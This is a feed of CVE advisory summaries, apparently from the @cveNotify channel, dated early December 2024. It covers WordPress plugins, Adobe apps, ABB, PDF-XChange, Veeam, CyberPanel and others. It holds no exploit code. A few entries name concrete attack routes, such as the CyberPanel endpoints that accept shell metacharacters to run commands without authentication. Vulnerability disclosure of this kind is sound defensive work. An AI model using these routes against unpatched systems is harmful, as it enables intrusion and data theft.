🚨 CVE-2024-20737After Effects versions 24.1, 23.6.2 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-05 15:38:06 |
🚨 CVE-2023-28826This issue was addressed with improved redaction of sensitive information. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, macOS Monterey 12.7.4, macOS Sonoma 14.1, macOS Ventura 13.6.5. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-12-05 15:38:03 |
🚨 CVE-2021-30205Incorrect access control in the component /index.php?mod=system&op=orgtree of dzzoffice 2.02.1_SC_UTF8 allows unauthenticated attackers to browse departments and usernames.🎖@cveNotify |
|
| 2024-12-05 15:38:02 |
🚨 CVE-2023-36664Artifex Ghostscript through 10.01.2 mishandles permission validation for pipe devices (with the %pipe% prefix or the | pipe character prefix).🎖@cveNotify |
|
| 2024-12-05 15:38:01 |
🚨 CVE-2023-34672Improper Access Control leads to adding a high-privilege user affecting Elenos ETG150 FM transmitter running on version 3.12 by exploiting user's role within the admin profile. An attack could occur over the public Internet in some cases.🎖@cveNotify |
|
| 2024-12-05 15:08:10 |
🚨 CVE-2024-20772Media Encoder versions 24.2.1, 23.6.4 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-05 13:38:05 |
🚨 CVE-2024-51543Information Disclosure vulnerabilities allow access to application configuration information. Affected products:ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02🎖@cveNotify |
|
| 2024-12-05 13:37:58 |
🚨 CVE-2024-51541Local File Inclusion vulnerabilities allow access to sensitive system information. Affected products:ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02🎖@cveNotify |
|
| 2024-12-05 13:37:57 |
🚨 CVE-2024-48845Weak Password Reset Rules vulnerabilities where found providing a potiential for the storage of weak passwords that could facilitate unauthorized admin/application access. Affected products:ABB ASPECT - Enterprise v3.07.02; NEXUS Series v3.07.02; MATRIX Series v3.07.02🎖@cveNotify |
|
| 2024-12-05 13:37:53 |
🚨 CVE-2024-48843Denial of Service vulnerabilities where found providing a potiential for device service disruptions. Affected products:ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02🎖@cveNotify |
|
| 2024-12-05 13:37:52 |
🚨 CVE-2024-12094This vulnerability exists in the Tinxy mobile app due to storage of logged-in user information in plaintext on the device database. An attacker with physical access to the rooted device could exploit this vulnerability by accessing its database leading to unauthorized access of user information such as username, email address and mobile number.🎖@cveNotify |
|
| 2024-12-05 13:37:48 |
🚨 CVE-2024-11316Fileszie Check vulnerabilities allow a malicious user to bypass size limits or overload to the product. Affected products:ABB ASPECT - Enterprise v3.08.02; NEXUS Series v3.08.02; MATRIX Series v3.08.02🎖@cveNotify |
|
| 2024-12-05 13:37:47 |
🚨 CVE-2024-6298Unauthorized file access in WEB Server in ABB ASPECT - Enterprise v3.08.01; NEXUS Series v3.08.01; MATRIX Series v3.08.01 allows Attacker to execute arbitrary code remotely🎖@cveNotify |
|
| 2024-12-05 13:37:46 |
🚨 CVE-2024-6209Unauthorized file access in WEB Server in ABB ASPECT - Enterprise v3.08.01; NEXUS Series v3.08.01; MATRIX Series v3.08.01 allows Attacker to access files unauthorized🎖@cveNotify |
|
| 2024-12-05 11:38:13 |
🚨 CVE-2024-52269User Interface (UI) Misrepresentation of Critical Information vulnerability in DocuSign allows Content Spoofing.The SaaS AI assistant ignores hidden content that is rendered after signing, misleading the user.For reference see: CVE-2024-52276This issue affects DocuSign: through 2024-12-04.🎖@cveNotify |
|
| 2024-12-05 11:38:12 |
🚨 CVE-2024-42455A vulnerability in Veeam Backup & Replication allows a low-privileged user to connect to remoting services and exploit insecure deserialization by sending a serialized temporary file collection. This exploit allows the attacker to delete any file on the system with service account privileges. The vulnerability is caused by an insufficient blacklist during the deserialization process.🎖@cveNotify |
|
| 2024-12-05 10:37:58 |
🚨 CVE-2024-11341The Simple Redirection plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.5. This is due to missing or incorrect nonce validation on the settings_page() function. This makes it possible for unauthenticated attackers to update the plugin's settings and redirect all site visitors via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-05 10:37:52 |
🚨 CVE-2024-11324The Accounting for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-12-05 10:37:51 |
🚨 CVE-2024-10777The AnyWhere Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.2.11 via the 'INSERT_ELEMENTOR' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.🎖@cveNotify |
|
| 2024-12-05 10:37:50 |
🚨 CVE-2022-41137Apache Hive Metastore (HMS) uses SerializationUtilities#deserializeObjectWithTypeInformation method when filtering and fetching partitions that is unsafe and can lead to Remote Code Execution (RCE) since it allows the deserialization of arbitrary data.In real deployments, the vulnerability can be exploited only by authenticated users/clients that were able to successfully establish a connection to the Metastore. From an API perspective any code that calls the unsafe method may be vulnerable unless it performs additional prerechecks on the input arguments.🎖@cveNotify |
|
| 2024-12-05 09:37:34 |
🚨 CVE-2024-10937The Related Posts, Inline Related Posts, Contextual Related Posts, Related Content By PickPlugins plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.0.58 via the wp_ajax_nopriv_related_post_ajax_get_post_ids AJAX action. This makes it possible for unauthenticated attackers to extract sensitive data including titles of posts in draft status.🎖@cveNotify |
|
| 2024-12-05 08:37:45 |
🚨 CVE-2024-7488Improper Input Validation vulnerability in RestApp Inc. Online Ordering System allows Integer Attacks.This issue affects Online Ordering System: 8.2.1. NOTE: Vulnerability fixed in version 8.2.2 and does not exist before 8.2.1.🎖@cveNotify |
|
| 2024-12-05 06:37:56 |
🚨 CVE-2024-11429The Free Responsive Testimonials, Social Proof Reviews, and Customer Reviews – Stars Testimonials plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.3.3 via the 'stars-testimonials-with-slider-and-masonry-grid' shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included.🎖@cveNotify |
|
| 2024-12-05 04:37:24 |
🚨 CVE-2024-10881The LUNA RADIO PLAYER plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'lunaradio' shortcode in versions up to, and including, 6.24.11.07 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-05 02:08:33 |
🚨 CVE-2024-51378getresetstatus in dns/views.py and ftp/views.py in CyberPanel (aka Cyber Panel) before 1c0c6cb allows remote attackers to bypass authentication and execute arbitrary commands via /dns/getresetstatus or /ftp/getresetstatus by bypassing secMiddleware (which is only for a POST request) and using shell metacharacters in the statusfile property, as exploited in the wild in October 2024 by PSAUX. Versions through 2.3.6 and (unpatched) 2.3.7 are affected.🎖@cveNotify |
|
| 2024-12-04 23:37:44 |
🚨 CVE-2024-12182A vulnerability, which was classified as problematic, has been found in DedeCMS 5.7.116. Affected by this issue is some unknown functionality of the file /member/soft_add.php. The manipulation of the argument body leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-04 23:07:51 |
🚨 CVE-2024-20791Illustrator versions 28.4, 27.9.3 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-04 22:37:32 |
🚨 CVE-2024-53916In OpenStack Neutron before 25.0.1, neutron/extensions/tagging.py can use an incorrect ID during policy enforcement. It does not apply the proper policy check for changing network tags. An unprivileged tenant is able to change (add and clear) tags on network objects that do not belong to the tenant, and this action is not subjected to the proper policy authorization check. This affects 23 before 23.2.1, 24 before 24.0.2, and 25 before 25.0.1.🎖@cveNotify |
|
| 2024-12-04 22:37:26 |
🚨 CVE-2024-1704A vulnerability was found in ZhongBangKeJi CRMEB 5.2.2. It has been declared as critical. This vulnerability affects the function save/delete of the file /adminapi/system/crud. The manipulation leads to path traversal. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-254392. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-12-04 22:37:25 |
🚨 CVE-2023-42835A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.1. An attacker may be able to access user data.🎖@cveNotify |
|
| 2024-12-04 22:07:34 |
🚨 CVE-2024-20757Bridge versions 13.0.5, 14.0.1 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-04 22:07:29 |
🚨 CVE-2024-20752Bridge versions 13.0.5, 14.0.1 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-04 22:07:28 |
🚨 CVE-2024-20745Premiere Pro versions 24.1, 23.6.2 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-04 21:38:00 |
🚨 CVE-2024-23249The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.4. Processing a file may lead to a denial-of-service or potentially disclose memory contents.🎖@cveNotify |
|
| 2024-12-04 21:37:54 |
🚨 CVE-2024-26469Server-Side Request Forgery (SSRF) vulnerability in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36, allows remote attackers to cause a denial of service (DoS) and escalate privileges via the url parameter in the postProcess() method.🎖@cveNotify |
|
| 2024-12-04 21:37:53 |
🚨 CVE-2024-1674Inappropriate implementation in Navigation in Google Chrome prior to 122.0.6261.57 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-12-04 21:37:52 |
🚨 CVE-2023-50923In QUIC in RFC 9000, the Latency Spin Bit specification (section 17.4) does not strictly constrain the bit value when the feature is disabled, which might allow remote attackers to construct a covert channel with data represented as changes to the bit value. NOTE: The "Sheridan, S., Keane, A. (2015). In Proceedings of the 14th European Conference on Cyber Warfare and Security (ECCWS), University of Hertfordshire, Hatfield, UK." paper says "Modern Internet communication protocols provide an almost infinite number of ways in which data can be hidden or embed whithin seemingly normal network traffic."🎖@cveNotify |
|
| 2024-12-04 21:07:48 |
🚨 CVE-2024-11743A vulnerability, which was classified as problematic, was found in SourceCodester Best House Rental Management System 1.0. Affected is an unknown function of the file /rental/ajax.php?action=delete_user of the component POST Request Handler. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-04 21:07:47 |
🚨 CVE-2024-11678A vulnerability was found in CodeAstro Hospital Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /backend/doc/his_doc_register_patient.php. The manipulation of the argument pat_fname/pat_ailment/pat_lname/pat_age/pat_dob/pat_number/pat_phone/pat_type/pat_addr leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-04 20:37:26 |
🚨 CVE-2024-11675A vulnerability has been found in CodeAstro Hospital Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /backend/admin/his_admin_register_patient.php of the component Add Patient Details Page. The manipulation of the argument pat_fname/pat_ailment/pat_lname/pat_age/pat_dob/pat_number/pat_phone/pat_type/pat_addr leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-04 20:37:25 |
🚨 CVE-2024-11673A vulnerability, which was classified as problematic, has been found in 1000 Projects Bookstore Management System 1.0. This issue affects some unknown processing. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-12-04 19:37:26 |
🚨 CVE-2024-11664A vulnerability, which was classified as critical, has been found in eNMS up to 4.2. Affected by this issue is the function multiselect_filtering of the file eNMS/controller.py of the component TGZ File Handler. The manipulation leads to path traversal. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The patch is identified as 22b0b443acca740fc83b5544165c1f53eff3f529. It is recommended to apply a patch to fix this issue.🎖@cveNotify |
|
| 2024-12-04 19:37:25 |
🚨 CVE-2024-8360Visteon Infotainment REFLASH_DDU_ExtractFile Command Injection Remote Code Execution Vulnerability. This vulnerability allows physically present attackers to execute arbitrary code on affected installations of Visteon Infotainment systems. Authentication is not required to exploit this vulnerability.The specific flaw exists within the REFLASH_DDU_ExtractFile function. A crafted software update file can trigger execution of a system call composed from a user-supplied string. An attacker can leverage this vulnerability to execute code in the context of the device. Was ZDI-CAN-23421.🎖@cveNotify |
|
| 2024-12-04 19:08:12 |
🚨 CVE-2024-11661A vulnerability was found in Codezips Free Exam Hall Seating Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file profile.php of the component Profile Image Handler. The manipulation of the argument image leads to unrestricted upload. The attack can be initiated remotely. The researcher submit confuses the vulnerability class of this issue.🎖@cveNotify |
|
| 2024-12-04 18:08:28 |
🚨 CVE-2024-11660A vulnerability was found in code-projects Farmacia 1.0. It has been classified as problematic. This affects an unknown part of the file usuario.php. The manipulation of the argument name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Other parameters might be affected as well.🎖@cveNotify |
|
| 2024-12-04 18:08:27 |
🚨 CVE-2024-22457Dell Secure Connect Gateway 5.20 contains an improper authentication vulnerability during the SRS to SCG update path. A remote low privileged attacker could potentially exploit this vulnerability, leading to impersonation of the server through presenting a fake self-signed certificate and communicating with the remote server.🎖@cveNotify |
|
| 2024-12-04 17:07:58 |
🚨 CVE-2024-8848PDF-XChange Editor AcroForm Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of AcroForms. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-25268.🎖@cveNotify |
|
| 2024-12-04 17:07:52 |
🚨 CVE-2024-8847PDF-XChange Editor Doc Object Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Doc objects. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-25198.🎖@cveNotify |
|
| 2024-12-04 17:07:51 |
🚨 CVE-2024-8844PDF-XChange Editor PDF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24550.🎖@cveNotify |
|
| 2024-12-04 17:07:50 |
🚨 CVE-2024-8843PDF-XChange Editor JB2 File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of JB2 files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-24495.🎖@cveNotify |
|
| 2024-12-04 17:07:46 |
🚨 CVE-2024-30275Adobe Aero Desktop versions 23.4 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-04 17:07:45 |
🚨 CVE-2024-0638Least privilege violation in the Checkmk agent plugins mk_oracle, mk_oracle.ps1, and mk_oracle_crs before Checkmk 2.3.0b4 (beta), 2.2.0p24, 2.1.0p41 and 2.0.0 (EOL) allows local users to escalate privileges.🎖@cveNotify |
|
| 2024-12-04 16:38:24 |
🚨 CVE-2024-21075Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: Claim Line LOV). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-12-04 16:38:18 |
🚨 CVE-2024-21073Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: Claim LOV). Supported versions that are affected are 12.2.3-12.2.13. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).🎖@cveNotify |
|
| 2024-12-04 16:38:17 |
🚨 CVE-2023-32622Improper neutralization of special elements in WL-WN531AX2 firmware versions prior to 2023526 allows an attacker with an administrative privilege to execute OS commands with the root privilege.🎖@cveNotify |
|
| 2024-12-04 16:38:16 |
🚨 CVE-2023-21208In setCountryCodeInternal of sta_iface.cpp, there is a possible out of bounds read due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-262245254🎖@cveNotify |
|
| 2024-12-04 16:08:22 |
🚨 CVE-2024-22336IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279976.🎖@cveNotify |
|
| 2024-12-04 16:08:21 |
🚨 CVE-2024-22335IBM QRadar Suite 1.10.12.0 through 1.10.17.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 279975.🎖@cveNotify |
|
| 2024-12-04 15:38:20 |
🚨 CVE-2024-20795Animate versions 23.0.4, 24.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-04 15:38:19 |
🚨 CVE-2024-27324PDF-XChange Editor TIF File Parsing Out-Of-Bounds Read Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of PDF-XChange Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of TIF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-22270.🎖@cveNotify |
|
| 2024-12-04 15:38:18 |
🚨 CVE-2023-7236The Backup Bolt WordPress plugin through 1.3.0 is vulnerable to Information Exposure via the unprotected access of debug logs. This makes it possible for unauthenticated attackers to retrieve the debug log which may contain information like system errors which could contain sensitive information.🎖@cveNotify |
|
| 2024-12-04 15:38:15 |
🚨 CVE-2024-20764Animate versions 24.0, 23.0.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-04 15:38:14 |
🚨 CVE-2024-20762Animate versions 24.0, 23.0.3 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-04 15:38:13 |
🚨 CVE-2019-11881A vulnerability exists in Rancher before 2.2.4 in the login component, where the errorMsg parameter can be tampered to display arbitrary content, filtering tags but not special characters or symbols. There's no other limitation of the message, allowing malicious users to lure legitimate users to visit phishing sites with scare tactics, e.g., displaying a "This version of Rancher is outdated, please visit https://malicious.rancher.site/upgrading" message.🎖@cveNotify |
|
| 2024-12-04 14:38:37 |
🚨 CVE-2024-12138A vulnerability classified as critical was found in horilla up to 1.2.1. This vulnerability affects the function request_new/get_employee_shift/create_reimbursement/key_result_current_value_update/create_meetings/create_skills. The manipulation leads to deserialization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-12-04 14:38:36 |
🚨 CVE-2024-30273Illustrator versions 28.3, 27.9.2 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-12-04 13:38:22 |
🚨 CVE-2023-40735Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Cavo – Connecting for a Safer World BUTTERFLY BUTTON (Architecture flaw) allows loss of plausible deniability and confidentiality.This issue affects BUTTERFLY BUTTON: As of 2023-08-21.🎖@cveNotify |
|
| 2024-12-04 11:37:40 |
🚨 CVE-2024-52276** INITIAL LIMITED RELEASE **User Interface (UI) Misrepresentation of Critical Information vulnerability in [WITHHELD] allows Content Spoofing.This issue affects [WITHHELD]: through 2024-12-04.🎖@cveNotify |
|
| 2024-12-04 11:37:39 |
🚨 CVE-2024-52275Stack-based Buffer Overflow vulnerability in Shenzhen Tenda Technology Co Tenda AC6V2 (fromWizardHandle modules) allows Overflow Buffers.This issue affects Tenda AC6V2: through 15.03.06.50.🎖@cveNotify |
|
| 2024-12-04 11:37:35 |
🚨 CVE-2024-52273Stack-based Buffer Overflow vulnerability in Shenzhen Tenda Technology Co Tenda AC6V2 (setDoublePppoeConfig->guest_ip_check(overflow arg: mask) modules) allows Overflow Buffers.This issue affects Tenda AC6V2: through 15.03.06.50🎖@cveNotify |
|
| 2024-12-04 11:37:34 |
🚨 CVE-2024-41156Profile files from TRO600 series radios are extracted in plain-textand encrypted file formats. Profile files provide potential attackersvaluable configuration information about the Tropos network. Profilescan only be exported by authenticated users with higher privilege of write access.🎖@cveNotify |
|
| 2024-12-04 09:39:03 |
🚨 CVE-2024-5020Multiple plugins for WordPress are vulnerable to Stored Cross-Site Scripting via the plugin's bundled FancyBox JavaScript library (versions 1.3.4 to 3.5.7) in various versions due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-04 09:39:02 |
🚨 CVE-2024-10787The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.4.4 via the 'elementor-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private and draft posts created by Elementor that they should not have access to.🎖@cveNotify |
|
| 2024-12-04 09:39:01 |
🚨 CVE-2024-10567The TI WooCommerce Wishlist plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'wizard' function in all versions up to, and including, 2.9.1. This makes it possible for unauthenticated attackers to create new pages, modify plugin settings, and perform limited options updates.🎖@cveNotify |
|
| 2024-12-04 08:38:28 |
🚨 CVE-2024-50311A denial of service (DoS) vulnerability was found in OpenShift. This flaw allows attackers to exploit the GraphQL batching functionality. The vulnerability arises when multiple queries can be sent within a single request, enabling an attacker to submit a request containing thousands of aliases in one query. This issue causes excessive resource consumption, leading to application unavailability for legitimate users.🎖@cveNotify |
|
| 2024-12-04 08:38:21 |
🚨 CVE-2023-40660A flaw was found in OpenSC packages that allow a potential PIN bypass. When a token/card is authenticated by one process, it can perform cryptographic operations in other processes when an empty zero-length pin is passed. This issue poses a security risk, particularly for OS logon/screen unlock and for small, permanently connected tokens to computers. Additionally, the token can internally track login status. This flaw allows an attacker to gain unauthorized access, carry out malicious actions, or compromise the system without the user's awareness.🎖@cveNotify |
|
| 2024-12-04 08:38:20 |
🚨 CVE-2023-41175A vulnerability was found in libtiff due to multiple potential integer overflows in raw2tiff.c. This flaw allows remote attackers to cause a denial of service or possibly execute an arbitrary code via a crafted tiff image, which triggers a heap-based buffer overflow.🎖@cveNotify |
|
| 2024-12-04 07:37:41 |
🚨 CVE-2024-11398Improper limitation of a pathname to a restricted directory ('Path Traversal') vulnerability in OTP reset functionality in Synology Router Manager (SRM) before 1.3.1-9346-9 allows remote authenticated users to delete arbitrary files via unspecified vectors.🎖@cveNotify |
|
| 2024-12-04 07:37:40 |
🚨 CVE-2023-52943Incorrect authorization vulnerability in Alert.Setting webapi component in Synology Surveillance Station before 9.2.0-11289 and 9.2.0-9289 allows remote authenticated users to to perform limited actions on the alerting function via unspecified vectors.🎖@cveNotify |
|
| 2024-12-04 06:37:45 |
🚨 CVE-2024-54664An issue was discovered in Veritas NetBackup before 10.5. This only applies to NetBackup components running on a Windows Operating System. If a user executes specific NetBackup commands or an attacker uses social engineering techniques to impel the user to execute the commands, a malicious DLL could be loaded, resulting in execution of the attacker's code in the user's security context, a different vulnerability than CVE-2024-52945.🎖@cveNotify |
|
| 2024-12-04 05:37:30 |
🚨 CVE-2024-54661readline.sh in socat through 1.8.0.1 relies on the /tmp/$USER/stderr2 file.🎖@cveNotify |
|
| 2024-12-04 03:37:45 |
🚨 CVE-2024-11747The Responsive Videos plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'somryv' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-12-04 03:37:38 |
🚨 CVE-2024-10663The Eleblog – Elementor Blog And Magazine Addons plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the goodbye_form_callback() function in all versions up to, and including, 1.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to submit a deactivation reason.🎖@cveNotify |
|
| 2024-12-04 03:37:37 |
🚨 CVE-2024-10587The Interactive Contact Form and Multi Step Form Builder with Drag & Drop Editor – Funnelforms Free plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.7.4.1 via deserialization of untrusted input. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.🎖@cveNotify |
|
| 2024-12-04 02:37:44 |
🚨 CVE-2024-42451A vulnerability in Veeam Backup & Replication allows low-privileged users to leak all saved credentials in plaintext. This is achieved by calling a series of methods over an external protocol, ultimately retrieving the credentials using a malicious setup on the attacker's side. This exposes sensitive data, which could be used for further attacks, including unauthorized access to systems managed by the platform.🎖@cveNotify |
|
| 2024-12-04 02:37:37 |
🚨 CVE-2024-53916In OpenStack Neutron through 25.0.0, neutron/extensions/tagging.py can use an incorrect ID during policy enforcement. NOTE: 935883 has the "Work in Progress" status as of 2024-11-24.🎖@cveNotify |
|
| 2024-12-04 02:37:36 |
🚨 CVE-2024-11079A flaw was found in Ansible-Core. This vulnerability allows attackers to bypass unsafe content protections using the hostvars object to reference and execute templated content. This issue can lead to arbitrary code execution if remote data or module outputs are improperly templated within playbooks.🎖@cveNotify |
|
| 2024-12-04 02:07:42 |
🚨 CVE-2024-11680ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Remote, unauthenticated attackers can exploit this flaw by sending crafted HTTP requests to options.php, enabling unauthorized modification of the application's configuration. Successful exploitation allows attackers to create accounts, upload webshells, and embed malicious JavaScript.🎖@cveNotify |
|
| 2024-12-04 02:07:41 |
🚨 CVE-2023-45727Proself Enterprise/Standard Edition Ver5.62 and earlier, Proself Gateway Edition Ver1.65 and earlier, and Proself Mail Sanitize Edition Ver1.08 and earlier allow a remote unauthenticated attacker to conduct XML External Entity (XXE) attacks. By processing a specially crafted request containing malformed XML data, arbitrary files on the server containing account information may be read by the attacker.🎖@cveNotify |
|
| 2024-12-03 23:38:00 |
